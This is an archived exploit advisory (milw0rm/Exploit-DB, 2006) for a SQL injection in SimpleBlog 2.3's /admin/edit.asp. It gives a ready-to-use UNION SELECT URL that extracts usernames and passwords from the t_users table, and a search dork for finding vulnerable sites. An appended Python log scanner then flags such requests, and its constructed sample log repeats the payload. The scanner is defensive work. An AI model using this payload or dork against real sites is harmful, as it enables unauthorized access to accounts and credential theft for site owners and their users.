SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection

EDB-ID: 2853
Author: bolivar
Type: webapps
Platform: ASP
Date: 2006-11-26


# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]
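
A detection check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server log lines for requests to /admin/edit.asp whose id parameter is not a plain integer. The log layout, the sample lines and the assumption that legitimate id values are non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in a simplified "METHOD URI STATUS" layout (not real traffic).
SAMPLE_LOG = """\
GET /blog/admin/edit.asp?id=12 200
GET /blog/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users 200
GET /blog/admin/edit.asp?id=-1%20UNION%20SELECT%200,1 500
GET /blog/admin/edit.asp?id=12%27 200
GET /blog/default.asp?id=-1+union+select+1 200
GET /blog/admin/edit.asp 200
"""

TARGET_PATH = "/admin/edit.asp"   # script named in the advisory
INTEGER = re.compile(r"\d+")      # assumption: valid ids are non-negative integers
SQL_WORDS = re.compile(r"\b(union|select|from)\b", re.IGNORECASE)


def check_line(line):
    """Return a finding for an edit.asp request with a non-integer id, else None."""
    fields = line.split()
    if len(fields) < 3:
        return None
    url = urlsplit(fields[1])
    if not url.path.lower().endswith(TARGET_PATH):
        return None
    # parse_qs decodes '+' and %xx, so encoded variants normalise to the same text.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if INTEGER.fullmatch(value):
            continue
        words = sorted({w.lower() for w in SQL_WORDS.findall(value)})
        return {
            "id": value,
            "sql_keywords": words,
            "severity": "high" if words else "medium",
            "status": fields[2],
        }
    return None


def scan(log_text):
    """Run check_line over every line and collect the findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned status 200 deserves attention first, since the page rendered instead of erroring out.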